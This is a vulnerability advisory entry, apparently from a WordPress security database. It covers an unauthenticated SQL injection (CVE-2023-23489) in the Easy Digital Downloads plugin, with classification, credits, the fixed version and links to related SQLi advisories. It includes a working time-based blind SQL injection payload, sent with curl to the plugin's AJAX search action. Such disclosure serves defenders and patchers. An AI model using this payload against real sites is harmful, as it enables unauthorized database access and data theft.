Easy Digital Downloads 3.1.0.2 & 3.1.0.3 – Unauthenticated SQLi | CVE 2023-23489

Description

The plugin does not properly sanitise and escape the s parameter before using it in a SQL statement via the edd_download_search AJAX action , leading to a SQL injection exploitable by unauthenticated users

Proof of Concept

curl "https://example.com/wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+-"

Affects Plugins

easy-digital-downloads

Fixed in 3.1.0.4

References

CVE

CVE-2023-23489

URL

https://www.tenable.com/security/research/tra-2023-2

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

CVSS

8.6 (high)

Miscellaneous

Original Researcher

Joshua Martinelle (Tenable)

Verified

WPVDB ID

c5a6830c-6420-42fc-b20c-8e20224d6f18

Timeline

Publicly Published

2023-01-12 (about 1 years ago)

Added

2023-01-20 (about 1 years ago)

Last Updated

2023-01-20 (about 1 years ago)

Other

Published

Title

Published

2015-11-24

Title

Contact Form Maker <= 1.7.30 - Authenticated Blind SQL Injection

Published

2021-10-05

Title

WP Bannerize 2.0.0 - 4.0.2 - Authenticated SQL Injection

Published

2024-02-16

Title

MasterStudy LMS WordPress Plugin – for Online Courses and Education < 3.2.6 - Unauthenticated SQL Injection

Published

2023-01-12

Title

Paid Membership Pro < 2.9.8 - Unauthenticated SQLi

Published

2024-04-22

Title

WP-Recall – Registration, Profile, Commerce & More < 16.26.6 - Authenticated (Contributor+) SQL Injection